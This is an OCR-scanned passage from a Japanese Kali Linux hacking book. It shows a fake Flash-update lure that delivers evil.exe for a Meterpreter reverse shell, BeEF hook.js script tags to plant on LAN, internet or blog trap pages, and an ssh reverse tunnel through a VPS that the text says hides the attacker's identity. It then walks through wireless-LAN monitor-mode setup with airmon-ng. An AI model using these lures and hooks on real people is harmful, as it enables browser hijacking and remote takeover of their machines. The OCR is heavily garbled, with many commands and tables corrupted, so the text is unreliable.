も ee OwtUla、-- 


も 





図 664 偽 の Adobe Flash の アッ プ デ ー ト 画面 


6 ターゲット 端末 で ベイ ロー ド を 実行 する 
探 作 者 が evilexe ファ イル を 実行 する と 、Meterpreter モッ ショ ン が 確立 し ま 
す (Kali 側 で は 事前 に リバ ー ス シェ ル の 待ち 受け 状態 を 作っ て お く )。 


@ BeEF の 戻 ペ ー ン を 設置 する 

LAN 内 に ター ゲッ ト 端 末 が 存在 し 、 記 ペー ジ も LAN 内 に 設置 する の で あれ ば 、 
傘 の コー ド を 含む Web ペー ジ を 設置 する だ け で す 。 通常 の HTML フ ァイル で あれ 
ば 、BODY タグ の 中 に 入れ て お け ば よい で し ょ う C30)。 中間 者 攻撃 は 必要 あり ま 
せん 。 


<script src="http : / /<Kali の TP アド レス >: 3999/hook . js "></script> 
ター ゲッ ト 端 末 が この ペー ジ を 開く と 、BeEF の コン トロ ー ル パネ ル に ター 
ゲッ ト 端 末 が 表示 され ます 。 


これ と 同様 の こと を イン ター ネッ ト の Web ペ ー ジ で も 実現 で きま す 。 た だ し 、 
イン ター ネッ ト か ら (Kali が 属す る ) LAN に は 直接 アク セス で きま せん 。 そこで 、 


30 : HEAD タグ の 中 に 入れ て も 動作 し ます が 、 ペ ー ジ の 表示 に 時 間 が か か る 可能 性 が あり ます 。 
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ルー ター の グロ ー バ ル IP ア ドレ ス を 指定 し た 形 の コー ド に な り ま す C31)。 





そし て 、 ル ー タ ー で は 次 の よう な ボー ト フ ォ ワ ー デ ィング の 設定 を し ます 。 


* WAN 側 ポ ー ト (サー ビス ポー ト ) : 3000 
・LAN 側 ポー ト (内 部 ポ ボート) : 3000 

* LAN 側 の 転送 先 IP アド レス : Kali の IP アド レス 
s プロ トコ ル : すべ て 


庶 ペ ー ジ を ブロ グ に 設置 する の で あれ ば 、 プ ログ の テー マ に 上 記 の コー ド を 埋 
め 込 むこ と で 、 す べ て の Web ペ ー ジ に 適用 で きま す 。 

一 見 する と 効果 的 な 攻撃 の よう に 見 えま す が 、 タ ー ゲ ッ ト が 罠 ペー ジ を 閉じ て 
し まう と 、BeEF の コン トロ ー ル パネ ル か ら タ ー ゲ ッ ト 端 末 は 消え て し まい ます 。 
つま り 、 一 部 を 自動 化し な いと 、 さ ら な る 攻撃 は な か な か うま くい か な いで し ょ 
う 。 


31 : 静 的 IP アド レス で な けれ ば 、 ダ イナ ミッ ク DNS を 登録 し て 、 そ の ドメイン を 指定 する 方 が 
確実 で す 。 ダ イナ ミッ ク DNS と は 、 グ ロー バル IP アド レス が 変更 に な っ た 際 に 、 新 し い IP ア ド 
レス を 各 DNS サ ー バ ー に 通知 する サー ビス で す 。 ダイ ナミ ッ ク DNS サ ービス が 提供 する ホス ト 
名 を 用 いれ ば 、IP ア ドレ ス が 動 的 に 変わ る こと を 意識 する 必要 が な く な り ま す 。 
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VPS 経由 で BeEF の ター ゲッ ト を 監視 する 
イン ター ネッ ト の 罠 ペー ジ に は 、 次 の コー ド を 仕込 むと 説明 し まし た 。 


<script src="http : //< ル ー タ ー の グロ ー バ ル TP ア ドレ ス >:3999/hook . 


]S "></ scr1Dpt> 


し か し 、 これ で は 問題 が あり ます 。「 ル ー タ ー の グロ ー バ ル TP ア ドレ ス 」 = 「 攻 
撃 者 の 居所 ] と いう こと で す 。Web ペ ー ジ の ソー ス を 見 た だ け で 攻撃 が ば れる だ 
け で な く 、 身 元 ま で ば ぱ ばれ て し まい ます 。 少し で も 匿名 性 を 上 げ る た め に 、VPS に 
中 継 さ せる と いう テク ニッ ク が 有効 で す 。 罠 ペー ジ に は 、 次 の よう な コー ド を 仕 
込 な こと に な り ま す 。 


<script src="http ://<VPS の TP アド レス >: 3999/hook. js "></script> 


攻撃 者 は Kali で BeEF を 起動 し ます 。 そ の 後 、 次 の コマ ンド を 実行 し て 、 VPS と 
Kalii の 間 で リバ ー ス ポー ト フ ォ ワ ー デ ィング を 実現 し ます (*32)。 実行 後 、 
Terminal は その まま に し ます 。 


rootQka11i :<# ssh -R 3999:127.9.9.1:3999 root@<VPS の TP アド レス > 


後 は ター ゲッ ト が 罠 ペー ジ を 表示 する の を 待つ だ け で す 。 タ ー ゲ ダット が Web 
ペー ジ の ソー ス を 確認 し て も 、VPS の IP アド レス まで し か ば れ ま せん 。 


*32: リ バー スポ ー ト フォ ワー ディ ング に つい て は 、10.3 の | VPS 経由 で の Meterpreter セ ッ シ ョ 
ン 」 を 参照 し て くだ さい 。 
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1 いい 【AP た シン 





現在 は いた る と ころ で 無線 LAN が 違 人 人 され て いま す 。 無線 LAN は と て も 便利 
で す が 、 セ キュ リティ に 気 を 付け る 必要 が あり ます 。 こ こ で は 、 無線 LAN の ハッ 

グ 手 法 を 体験 する こと を 目的 と し 、 無線 LAN 上 で の パケ ッ ト キ ャ プチ ャ や 接 
ーー シーーーーーー ヘ ーー 


爵 無線 LAN アダ プター の モー ド の 種類 
無線 LAN ア ダ プ ター に は 、Managed モー ド と Monitor モー ド の 2 種類 が あり ま 
ます 。 


Managed モー ド 

Managed モー ド で は 、 自 身 宛 の 通信 の み を キャ プチ ャ し 、 そ の 他 の 通信 は キャ 
プチ ャ で きま せん 。 無線 LAN ア ダ プ ター の ドラ イ バ ー で 処理 され 、 復 号 済 み の 
デー タ を 取り 込み ます 。 つ まり 、 無線 LAN が 暗号 化 さ きれ て いて も 、 キ ャ プチ ャ さる 
れる デー タ に は 復号 済み の デー タ が 表示 され ます 。 


Monitor モー ド 

Monitor モ ー ド は 、 デ ー タ 人 を 行わ ず 、 無 株 LAN ネ ットワーク を 飛び 
交 っ て いる パケ ッ ト を 監視 する 特別 な モー ド で す 。 無線 LAN ア ダ プ ター で 受信 で 
さる 全 通 信 を キャ プチ ャ で ga す 。 暗号 化 さ れ た 通信 デー タ は 、 暗 号 化 され だ た ま 
ま ギ ヤブ プチ ャ さき さ 世 ます 

Monitor モー ド で は 高い 負荷 が か か る た め 、 パ ケッ ト の 取り こぼし が 発生 し や 
すい だ け で な く 、 無線 LAN ア ダ プ ター が 物理 的 に 故障 する 殖 れ も あり ます 。 


人 で 種 線 LAN フレ ー ム の フォ ー マ ッ ト 

無根 LAN の パケ ッ ト キ ャ プチ ャ の 前 に 、 無 線 L し AN フレ ー ム に つい て 簡単 に 解 
説 し ます 。 IEEE 802.11a/b/g の いずれ に お いて も 、 無線 LAN フ レー ム は 、PLCP 
(Physical Layer Convergence Protocol) プリ アン ブル 、PLCP ヘ ッ ダ ー、PSDU 
(Physical layer Service Data Unit) の 3 つか ら 構 成 さ れ ま す ( 表 6-9) ( 図 6-65)。 
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表 6-9 無線 LAN フ レー ム の 構成 要素 


PLCP プ リア ン ブ ル 同期 信号 の ビッ ト 列 レー 
PLCP ヘ ッ ダー 方 式 、 、 デ 物理 層 。 
PSDU IEEE 802.11 ヘ ッ ダ ー と デー タ デー タリ ンク 選 





図 6-65 無線 LAN フ レー ム の フォ ー マ ッ ト 


@ モー ド に よる アプ ブリ の 動作 の 違い 


無線 LAN ア ダ プ ター の モー ド に よっ て 、 各 アプ リ の 動作 が 異な り ま す 。 特 に 、 
モー ド に よっ て Wireshark で キャ プチ ャ で きる 範囲 が 異な り ま す ( 表 6-10)。 


表 6-10 モー ド と アプ リ の 動作 





ト し 環 還 還 





Managed モ | Monitor モ ー| " 
人 EE 証 n。 = mor>cmreweo 
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受信 可能 な すべ て の 通信 (33)。 
目 PC の 通信 1 つの 無線 LAN アダ プター は 1 
チャ ネル の み ("34)。 


| 強制 的 に Monitor モ ー ド 
に な っ て 動作 する 





沙 Monitor モー ド に で きる 無線 LAN アダ プター を 入手 する 


ドラ イ バ ー の 関係 上 、 Windows で Monitor モー ド を 扱え る 無線 LAN ア ダ プ ター 
は 特殊 な も の し か あり ませ ん 。 例え ば 、 次 の よう に 非常 に 高価 で あり 、 選 択 肢 も 
少な い の が 現状 で す 。 


* 米 Riverbed Technology 社 の AirPcap : 販売 終了 。 中 古 で 流通 し て いる も の を 入 
手 す る し か な い (日 本 で は ほとん ど 見 られ な い の で 海外 で 探す )。AirPcap Tx 
(IEEE 802.11b/g 対 応 ) は 2 万 円 前 後 、AirPcap Nx (IEEE 802.11a/b/g/n 対応 ) 
は 8 一 10 万 円 。 

・ 米 Metageek 社 の Eye Packet Analyzer : 独自 の Monitor モ ー ド ドラ イ バ ー と 
キャ プチ ャ ソフ ト の モット 。 ソ フト 単体 で の 実 売価 格 が 800 ドル 前 後 。 


Linux (Kali を 含む ) で あれ ば 、 数 千 円 程度 で 購入 で きる 無線 LAN アダ プター を 


*33 : 無線 LAN ア ダ プ ター の 規格 と 合 致 し た パケ ッ ト し か キャ プチ ャ で きま せん 。 例え ば 、IEEE 
80211g の み に 対 応 し た 無線 LAN ア ダ プ ター で は 、IEEE 802.11n の パケ ッ ト を キャ プチ ャ で きま 
せん 。 


*34 : 榎 数 の チャ ネル を 同時 に キャ プチ ャ する に は 、 チ ャ ネル 分 だ け 和 無線 LAN ア ダ プ ター を 用 意 
し な けれ ば な り ま せん 。 


*35 : ネッ トワ リー ク 層 (レイ ヤー3) 以上 の デー タ を 指し ます 。 


36: ラジ オタ ッ プ に は 、PLCP ヘ ッ ダ ー の 情報 を 反映 し て 、 電 波 の 情報 を 格納 し て いま す 。 つ ま 
り 、 受 信 し た 電波 の 強度 や 伝送 速度 が わか り ま す 。 
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Monitor モ ー ド に で きま す 。 し か し 、 ど の 無線 LAN ア ダ プ ター で も よい わけ で は 
あり ませ ん 。 無線 LAN ア ダ プ ター が 内 蔵 す る ハー ドウ ェ ア (C チ ッ プ や モジ ュー 
ル な ど ) と 、 ド ライ バー の 両方 が Monitor モー ド に 対応 し て いな けれ ば な ら な いた 
めで す 。 

ハー ドウ ェ ア は 対応 し て いる が 、 ド ライ バー が 対応 し て いな い 場 合 は 、 対 応 す 
る ドラ イ バ ー に 差し 替え る こと で Monitor モ ー ド に で きま す 。 し か し 、Monitor 
モー ド に 対応 し た ドラ イ バ ー を イン ター ネッ ト で 見 つけ る に は 手間 が か か り ま 
す 。 

そこ で 、 手 持ち の 無線 LAN ア ダ プ ター を 手当 た り 次 第 に 試し て 、 そ れ で も だ め 
な ら Kali で 動作 する と 報告 され て いる 無線 LAN ア ダ プ ター を 購入 する の が 効率 
的 と いえ ます 。 本 書 で は Kali の 仮想 マシ ン で USB 型 の 無線 LAN ア ダ プ ター を 認 
識 き せ て 、 無 株 LAN の ハッ キン グ に 活用 し ます ("37)。 


人 @ Kali で 動作 する 無線 LAN アダ タプ ター 
Kaii が サポ ボー ト し て いる 代表 的 な チッ プ セ ッ ト は 、 表 6-11 の 通り で す 。 


表 6-11 Kalil が サポ ー ト し て いる チッ プ セ ッ ト 


] TP_Link N150 TL-WN722N 
Alfa AWUS036NHA 
Atheros AR9271 WTXUP AR9271-XC 
WTXUP AR9271-2A 
Alfa AWUS036NH 
Ralink RT3070 Alfa AWUS036NEH 
Panda PAU05 


Ralink RT3572 Alfa AWUS051NH (Dual Band) 
Ralink RT5572 Buffalo WIU2-300D 
Ralink RT5370N Alfa AWUS036ACH 


Realtek 8187L 
(Wireless G adapters) Alfa AWUS036H 


Realtek HT8812AU Fenvi Dual Band AC 1200MbDps 





*37 : Kali を 物理 PC 上 に 構築 し た 場合 は 、USB 型 LAN ア ダ プ ター で な く て も 構い ませ ん 。 
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Alfa AWUS1900 
Realtek HTL88XX Alfa AWUS036ACH 
Panda PAUO6 


知 褒 か らい えば 、 動 作 す る か どう か は 実際 に 試し て みる まで わか り ま せん 。 例 
えば 、 手 持ち の 無線 LAN ア ダ プ ター を 試し た 結果 は 、 表 6-12 の 通り で し た 。 


| 





表 6-12 検証 し た 無線 LAN アダ プター 


ーー = コー ェ ら ョ uu 間 


ュ 


Monitor モー ド に し て も 
airOdumD-hng で AP スキャン 
で き な い 。 

一 度 Monitor モー ド に する と 
Managed モ ー ド に 戻し て も 
AP スキ ャ ン で き な い こと が あ 
る 


Buffalo WLLUC-GNM 
(Ralink HT8070) 


Monitor モー ド に し て も 


Buffalo WLLHUC-GNM2 airodump-ng で AP スキ ャ ン 


(Halink RT3070) 
TP-Link TL-WN725N 。 Monitor モ ー ド に で き な い 
(RTL8188EUS) (*38)。 


planex GW-USNANO2A - 
(Realtek RTL8188CUS) 動作 を 確認 し た 。 


Managed モー ド で も down し 
て か ら uDp し 上 直す と 、AP ス 
キャ ン で き な い 。 

表 6-11 に も 載っ て いる が 、 動 
作 し な か っ た 。 


Alfa AWUS036NEH 
(RT2870/RT3070) 


Alfa AWUS036NHA 


AP が 表示 され な いと いう 現象 を 確認 で きた ら 、 別 の 無線 LAN ア ダ プ ター を 試 
し て くだ さい 。 | 対応 チッ プ だ か ら 動 く は ず 」 と 決め つけ な い 方 が よい で し ょ う 。 





*38 : Error for wireless reaquest "Set Mode" (8BO6) : SET failed on device wlanO : Invalid 
argument. と いう メッ セー ジ が 表示 され ます 。 
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な お 、 技 適 マ ー ク を 取得 し て いな い 和 無線 通信 機器 (無線 LAN ア ダ プ ター を 含 
む ) を 日 本 国内 で 使用 する こと は 、 電波 法 條 反 に な る 場合 が あり ます (*39)。 た だ 
し 、 受 信 の み を 目的 と し た 機器 は 対象 外 と な り ま す 。 ま た 、 日 本 国内 向け の 無線 
LAN ル ー タ ー や 無線 LAN ア ダ プ ター の 出力 は 基本 的 に 10mW ま で の 制限 が か 
か っ て いま す (〈40)。 一 方 、 海外 に は 1W (=1.000mW) まで 使え る 国 も あり 、 こ 
うし た 機器 を 日 本 国内 で 使用 する こと は 禁じ られ て いま す 。 高 出力 の 機器 は 、 電 
波 暗 室内 の 実験 以外 で の 使用 を 控え て くだ さい 。 


沙 Kali で 無線 LAN ア ダ プ ター を 認識 させ る 

Kali で 無線 LAN を 攻撃 する た め に は 、Kali が 無線 LAN ア ダ プ ター を 認識 し な 
けれ ば な り ま せん 。 実機 で あれ ば 、 無線 LAN ア ダ プ ター を 装着 する だ け で す 。 し 
か し 、 ゲ スト OS の Kali の 場合 は 、 仮 想 環 境 の 特性 を 知っ て お く 必 要 が あり ます 。 

例え ば 、 次 の よう な 状況 を 考え て み ま す 。PC に USB の 無線 LAN アダ プター を 
壮 着 し て 、 こ の アダ プター で 無線 LAN に 接続 し ます 。 仮想 LAN ア ダ プ ター の 割 
り 当 て に |「 プ リッ ジア ダ プ ター」、 名 前 に 無線 LAN ア ダ プ ター の ドラ イ バ ー 名 
( 例 : 802.11n USB Wireless LAN Card) を 指定 し た と し ます 。 こ の 状態 で Kali を 
起動 し て も 、Kali か ら 見 る と 有線 LAN で ネッ トワ ー ク に 接続 し て いる よう に 見 え 
ます 。 実際 に は 無線 LAN ア ダ プ ター で 通信 し て いた と し て も 、 仮想 マ シン か ら 見 
る と 仮想 ネッ トワ ー ク が 有線 LAN に 接続 し て いる よう に 見 える わけ で す 。 こ れ で 
は 、 本 来 の 目標 を 達成 し て いま せん 。 


VirtualBox は 仮想 マシ ン に USB デバ イス を 認識 させ る 機能 を 備 を て いま す 。 こ 
れ を 利用 する た め に 次 の 手順 を 実行 し ます 。 


1 ホス ト OS で 無線 LAN アダ プター の 動作 確認 を する 

ホス ト OS に 無根 LAN ア ダ プ ター を 装着 し て 、 認 識 さ せ 、 簡 単に 動作 確認 し て 
くだ さい 。 本来 こ の 作業 は 不要 で す が 、 無線 LAN ア ダ プ ター が 物理 的 に 故障 し て 
いな いこ と を 確認 し て お きま す 。 ホ スト OS は ゲス ト OS よ り 動 作 確 認 が 容易 だ か 


*39 : http//wwwr.tele.soumu_.gojp/]/adm/monitoring/Summary/qa/giteki_mark/ 


*40 : 電波 法 の 改正 に より 、 出力 上 限 が 10mW か ら 1W へ と 引き 上 げ ら れ て いま す が 、 無 線 LAN 機 
童 に は まだ 適用 され て いま せん 。 
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ら で す 。 デバ イス マネ ー ジ ャ ー や ネッ トワ ー ク 接続 画面 (41) も 確認 し て お く と よ 


いで し ょ う ( 図 6-66)。 


中 (イス マネ 
ファ イル 中 準 作 (A 表 入 [の へ ルプ | ロ 
を 叶 皿 | 細 訓 更 


DLSKTOP ECUBLOS 
y 0 Ruetooth 
DEATMATAW コ トー テー 
) 5 WSp 昌 日 ロ I イ ダ ー 
ys 間 イル ジフ 7 テル イメ 
) 邊 オ ー チ 14 の 入力 お 7 党 カ 


> 縛 サ ウッド 、 ディ. お よび ゲー トコ ッ ト ロ - テ ラー 
) 王 シス テム デイ メス 

> 目 ソフ トウ アバ イス 

> 5 テイ スウ ドラ イプ 

* 者 ティ イス ブレイ 了 ザ ナダ - 

6 還 ネ ュ トリ ー ケ 7 アダ ナタ ー "マー 知 
- ドラ イ バ ー が 適用 され 、 無線 LAN 
アル た だ たつ | ら え 6L35E ネ . 下 


1 BigCSGGXn PCY に で (F で EGOSI VS etofki 
ピ Bartooxh Devkce ( 親 C て OMWM Prowoxd TDN 
縛 tctFO CS? M Cmoobt Network Connec tcn 
本 ntetR) Ccmtno( 本 Advrced-N em 
縛 VusBox Hoswt-Oviy themc1 Adaptei 02 
呈 WAN Ninport IKE 
則 WAN Mimaon (の) 
縛 WAN Mimpo IPYS 
旨 WAN Mimpod ITP) 


條 硬 ユエ ッ ト ロ - ル パネ ル > ネッ トワ ー ク と イッ ター ネッ ト > ネッ トワ ー ク 半 答 ットワーク 村 の p 
受理 ・ 是 ・ ロロ ⑧ 


Buroc の め コマ トワ ー ケ 生還 WT ーー | rualBew Hosk.Ony 
向 と れ ィ いざ せ ょ ヽ ビ mort まさ 
X ee テ 


RI し enc 者 Da で | PDm< こ pm * 5 WntDO ま Fuy* 玉 


0 sc 52zm 
追加 し た 無線 LAN ア ダ プ ター が 表示 され 、「 有 効 」 に し 
た 状態 で す 。 
緑色 の 電波 の 強度 の 印 は 、 受信 で きる 状態 に な っ て いる 
た さ . 


図 6.66 ホス ト OS で 無線 LAN アダ プター を 確認 する 


(②USB の 設定 を する 





VirtualBox を 起動 し て 、Kali の 仮想 マシ ン の 設定 画面 を 表示 し ます 。 左 ペイ ン 
で 「USB」 を 選択 し ます 。「USB コン トロ ー ラ ー を 有効 化 ] と 「USB 20 (EHCI) コ 


41:LAN ア ダ プ ター な ど を 一 覧 表示 する 画面 で あり 、| 有効 ・ 無 効 ] | 接続 ・ 切 断 ] を 指定 で 
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ント ロー ラー」 に チェ ッ ク が 入っ て いる こと を 確認 し ます (*42)。 本 書 で は 
Extension Pack を 遵 入 済み で あり 、USB 20 以 上 に チェ ッ ク が 入っ て いる は ず で 
す 。 

USB デバ イス フィ ルター に 無線 LAN ア ダ プ ター の も の (ここ で は |「ATHEROS 
UB91C」) を 登録 し ます ( 図 6-67) (43)。 無線 LAN ア ダ プ ター が 本 体 に 装着 され 
て いる 状態 で あれ ば 、 右 側 の [+] アイ コン か ら 追 加 で きま す 。 


( 訪 Ka Unux-2018.3 (6fbIO_maim - 立 定 


属 -w USB 
ッ ス テム USB コン トロ ー ラ ー ま 有 郊 化 (D 

〇 USB 1.1 (CHCD コッ トロ ー ラ ー 
ディ スナ レイ 





⑯) US 2 (EHCD コン トロ ー ラ ー 
スト レー ジ 〇 USB 0 HO1 エッ トロ ー ラ ー 
る USB デイ スラ rjLE ゴ ド ) 
販 テバ ATHEROS UBSYC[O108 
画 ネッ トワ ー ク 


ジリ ZMf- ト 

タ 

還 還 共有 フ ォ ル ダー 

コー ザー イツ ター フェ ー ス 


選 双 BS 


| キャ yh | 





図 6.67 USB の 設定 
その 後 、 無 線 LAN アダ プター を 本 体 か ら 取 り 外 し ます 。 


③Kali の 仮想 マシ ン に USB の 無線 LAN を 接続 する 
Kali の 仮想 マシ ン を 起動 し ます (*44)。 デ スク トッ プ 画 面 が 表示 され た ら 、 無 線 
LAN ア ダ プ ター を 本 体 に 装着 し ます 。 仮想 マシ ン の メニ ュー の |「 デ バイ ス 」 > 


*42 : 以前 の バー ジョ ン の VirtualBox の 場合 、 | USB 20 (EHCID コン トロ ー ラ ー」 だ と 無線 LAN に 
接続 で き な い と いう 現象 が 起き た よう で す 。 こ うし た 場合 は 、「USB 1.1 (OHCI) コン トロ ー ラ ー」 
を 指定 し ます 。 ま た 、 強 力 な 無線 LAN ア ダ プ ター を 用 いる 場合 、「USB 30 (xHCD コン トロ ー 
ラー」 を 指定 し な いと 、AP ス キャ ン 時 に 何 も 表 示さ れ な いこ と が ある よう で す 。 


*43 : 以降 の 手順 で USB 機器 が 認識 され な い 場 合 は 、 あ えて USB デバ イス フィ ルター を ゆる め に 
設定 する と いう 方 法 が あり ます 。「 名 前 」「 ペ ンダ ーID」「 プ ロダ クト ID」「 リ ビジ ョ ン 」] を 残し 
て 、「 メ ー カ ー」「 抽 品 名 ]」 「 シ リア ル No」 を 消し ます 。 


*44 : 仮想 ネッ トワ ー ク の 構成 を 変更 する 必要 は あり ませ ん 。 例え ば 、「 仮 想 LAN ア ダ プ ター1 は 
NAT、 仮 想 L し AN アダ プター2 以 降 は 使用 し な い 」 と いう 状態 で も 問題 あり ませ ん 。 
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Nr こ て 、 USB の デバ イス 名 (ここ で は |「ATHEROS UB91C」) が 選択 され て 
いる こと を 確認 し ます ( 図 6-68) ) 


欄 Ka Unux.2018.2 (が bmain [ 斉 生 年] - Orac le VM Virtua8o 
ファ イィ 御 福 マタ セツ る 示 入力 7 族 4| へ ルナ 
PPMCanoK ィ Paces EE 
ォ オー ティ オ 
呼 ネッ トワ ー ク 
ン (58 舞 の ぐ so を. 
Web カ 2 ち 


Upek 5ometik Touchxhip/Touchstsp 『ingerprint Senzor [OOCG1 


二 吉 フォ ル し ダー 1 muJS U |" 委 
クリ ッ プ ボー ド 0 の 式 有 Broadkcom Cowp, BCM2O455 (BDC-2.1] [07 過 
ドラ ッ グ & ドロップ Chicory Hectroncs Co、 Ltd Lenovo integrseed Camcrs (0 コ MP) OSS4I 


Gwest Addtons CD イメ ー ジ の 入 。。 韻 eo 


図 6.68 USB の 無線 LAN アダ プター の 認識 





USB の 無線 LAN ア ダ プ ター を 装着 する と 、 ホ スト OS の 画面 (デバ イス マネ ー 
ジャ ー や ネッ トワ リー ク 接 続 画 面 ) に 表示 され ます が 、 す ぐに ゲス ト OS が 認識 し 、 
ホス ト OS の 画面 か ら 消 えま す 。 つ まり 、 ホ スト OS と ゲス ト OS で 同じ USB デバ 
イス を 共用 で き な い と いう こと で す 。 


4 無線 LAN アタ プター の 状態 を 確認 する 

ifconfig コ マン ド で 、 有 効 な イン ター フェ ー ス を 表示 で きま す 。 出力 結果 に 、 無 
線 LAN の イン ター フェ ー ス 名 ( 例 : wlan0) が 存在 する こと を 確認 し ます 。 た だ 
し 、IP ア ドレ ス は 表示 され ませ ん C46)。 


Poot 個 ka11:<# ュ †conf1g 


また 、iwconfig コマ ンド を 用 いる と 、 無線 LAN ア ダ プ ター の 状態 を 確認 で きま 
す 。 こ こ で は イン ター フェ ー ス と し て wlan0 を 指定 し まし た 。 


*45 : 複数 の USB デバ イス を 装着 し 、 同 一 名 の USB の デバ イス 名 が ある 場合 は 、 ポ ボ ポップアップ さき 
れる ベン ダーID な どの 情報 か ら 識別 し ます 

*46: まだ 、AP に 接続 し て 動 的 に IP アド レス を 割り 当て られ た り 、 静 的 な IP アド レス を 設定 し た 
8 も て いな い ゝ た * め で gp 
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6 ビビ (ご くし ーー リー 。 月 = ば と っ つも すす まで て E 
| Managed モ ー ド に な っ て い る (詳細 は 人 後 で 解説 E ル っ だ 計 





iwconfig コ マン ド で wlan0 が 表示 され れ ば 、 そ の デバ イス が 認識 され て いま す 。 
また 、ijfconfig コ マン ド で wlan0 が 表示 され れ ば 、 そ の デバ イス が ネッ トワ ー ク 的 
に 有効 に な っ て いま す 。 こ の 悦 い を 認識 し て お く と 、 以 降 で 解説 する モー ド の 切 
り 菩 え の 概念 が わか りや すく な り ま す 。 


(5) 無線 LAN アダ プター の ドラ イ バ ー 名 や チッ プ セ ッ ト を 確認 する 
airmon-_ng コ マン ド を 実行 する と 、 認 識 し て いる 無線 LAN ア ダ プ ター の ドラ イ 
バー 名 や チッ プ セ ッ ト が 表示 され ます 。 
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USB デバ イス の 割り 当て エラ ー 


最初 か ら USB デバ イス を 装着 し た 状態 で 、 仮 想 マ シン を 起動 し て 認識 させ よう 
と する と 、「 割 り 当 て に 失敗 し まし た 」 と いう エラ ー が 発生 する こと が あり ます 
( 図 6-69) 。 


(人 Kai-Linup -2018.Z (CO_moin [ 主 行 中 ] - 〇 raclk VM VirualBox 

ファ イル 仮 本 マシ ヤン 表示 入力 テバ イス へ ヘル ブ 

USB デバ ゴイ ュ " Ralink SH2.1In WELAN [1" 員 折 相 マコ ン "Kali-Lmmux-2911 2 (5Wbt) main" へ 中 ま 則 当て に 失 飲 し まし た 。 
詳 尊 - 


LU5 和 dcvice "Ralink $02.11 n WLAN rh ULUED に wao シー タイ アー か ーー US プ mis husy wih an petmd3 TeLCSt Pease ny acoin ster 





読了 コー ド : E INVALIDARG (OxEO070057) 

イン ポー ネン ト : HsstJ5BCeyiceWras 

イン ター フェ ー ス : Hos1USEDsvice も 9079 ゆ Cc 軸 -431b-93b2-9511da2eh9 引 
叱 む 出し 発 に cnso p 1072d5645-4oh- 1721-boc2-55S510RbGcod| 





図 6-69 割り 当て エラ ー 


この と き は 、 仮想 マシ ン を 起動 し て OS が 完全 に 立ち 上 が っ た 状態 で 、USB デバ 
イス を PC に 装着 し ます 。 その後 、 メ ニュ ー か ら USB デバ イス を 指定 し ます 。USB 
デバ イス フィ ルター を 設定 し な いと き に 起こ る 場合 が 多い よう で す 。 


誠 GUI で AP スキ ャ ン す る 


Kali の 右上 を 押し て プル ダウ ン さ せま す 。「 WiFi Not Connected」 > 「Select 
Network」 を 選び ます 。 す る と 、「WiFi Networks」 画面 が 表示 され 、AP が 一 覧 
表示 され ます ( 図 6-70) 。 
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、wnneuos ES 7 
で Select a network 一 覧 表示 され ま す 。 
| 








ーーー ーー ィ ュー ニー テー ベーーー で < ーー 


Cancel 





図 6-/70 GUI で AP スキ ャ ン す る 


*ー 


ここ で 何 も 表 示さ れ な いと き は 、 無 線 LAN ア ダ プ ター が Managed モ ー ド に 
な っ て いる か を 確認 し て くだ さい 。Managed モー ド に も か か わら ず 表 示さ れ な け 
れ ば 、 無 線 LAN ア ダ プ ター ある い は ドラ イ バ ー の 問題 の 可能 性 が 高い と いえ 
す 。 ここ で 失敗 する 無線 LAN ア ダ プ ター で は 、iwlist コ マン ド や airodump-ng コマ 
ンド を 使っ た AP スキ ャ ン で も 表示 され な か っ た り 、 エ ラー が 発生 し た りす る こ 
と が あり ます 。 別 の 無線 LAN ア ダ プ ター を 試し て くだ さい 。 


沙 標準 の AP スキ ャ ン を する 


1 wlan0 が 有効 で ある こと を 確認 する 


次 の 2 つの コマ ンド で 、wlan0 が 認識 され 、 有 効 で ある こと を 確認 し ます 。 さ ら 
に 、Managed モー ド で ある こと も 確認 し ます ("47)。 
roo て 條 ka11:<# 1wcon†1g wlan9 
Foot 個 ka11:<# ュ †con†1g wlan9 
*47 : Monitor モ ー ド で iwlist wlan0 scan コ マン ド を 実行 する と "wlan0 Interface doesnt 
support scanning : Operation not supported と いう エラ ー が 返っ て きま す 
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ifconiig コ マン ド で 表示 され な い 場 合 に は 、ifconfig wlan0 up コマ ンド で 有効 に 
し ます 。 ま た 、Monitor モー ド の と き は 、Managed モー ド に 切り 奉 え ます 。 


(② AP スキ ャ ン を 開始 する 
次 の コマ ンド を 実行 し ます 。 





AP スキ ャ ン に 成功 すれ ば 、AP の 情報 が 出力 され ます 。 大 量 に 流れ て 読み 取れ 
な いこ と が 多い の で 、 次 の よう に grep し ます 。ESSID の 行 が あれ ば 、 正 常に ス 
キャ ン で き て いま す 。 
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"Interface doesnt support scanning" エラ ー へ の 対応 


iwlist wlan0 scan コマ ンド を 実行 し た と き 、 次 の よう な エラ ー が 発生 する こと 
が あり ます 。 


root 貼 ka11:<# 1w11s て wlan9 scan 


wlan9 Tnterface doesn "て support scann1ng : Network 1s down 


この と き 、iwconfig コ マン ド で 、 無 線 LAN ア ダ プ ター の Tx-Power が 0OdBm に 
な っ て いな いか を 確認 し ます 。0dBm に な っ て いた ら 、jipconfig コ マン ド で wlan0 
を 有効 に し て くだ さき さい 。Tx-Power の 値 が 戻る は ず で す 。 


Foot⑳Ka11:<# 1wCOnTig wlan9 
wlan9 IEEE 892.11 ESSTD:off/any 
Mode :Managed Access Point: Not-Associated 
Tx-Power=9 dBm 一 鹿本 雇 開 
Retry short 1ong 1imit:2 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management:of† 
Poot 人 kKa11 :<# 1TCOnf1g wlan9 up 
FOOt 仙 Ka11:<# 1wCOnfig wlan9 
wlan9 TEEE 892.11 ESSTD:off†/any 
Mode :Managed Access Point: Not-Associated 
Tx-Power=29 dBm 一 2 加 あ 2 き 較 
Retry short long 1imit:2 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management : of 
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無線 LAN アダ プター を Monitor モー ド に する 方 法 
Managed モー ド か ら Monitor モ ー ド に 切り 夫 え る に は 、 次 の 2 通り の 方 法 が あ 
り ま す 。 
* airmonng コ マン ド で 変更 する 方 法 
siwconfir コ マン ド で 変更 する 方 法 
airmon-ng コマ ンド で 変更 する 方 法 


この 方 法 で は 、 次 の よう に 入力 し ます 。 た だ し 、 イ ンタ ー フ ェ ー ス 名 は wlan0 と 
し ます 。 


# airmon-ng check ki11 


# airmon-ng Start wlan9 


最終 的 に wlan0monm と いう イン ター フェ ー ス が で き 、 これが Monitor モード に な 
リ り ます 。 


iwconfig コマ ンド で 変更 する 方 法 
この 方 法 で は 、 次 の よう に 入力 し ます 。 


# ifTconfig wlan9 down wlan9 を 無効 に する (ul1ane の 認識 は 残っ て いる ) 。 
# 1iwconfTig wlan9 mode monitor 


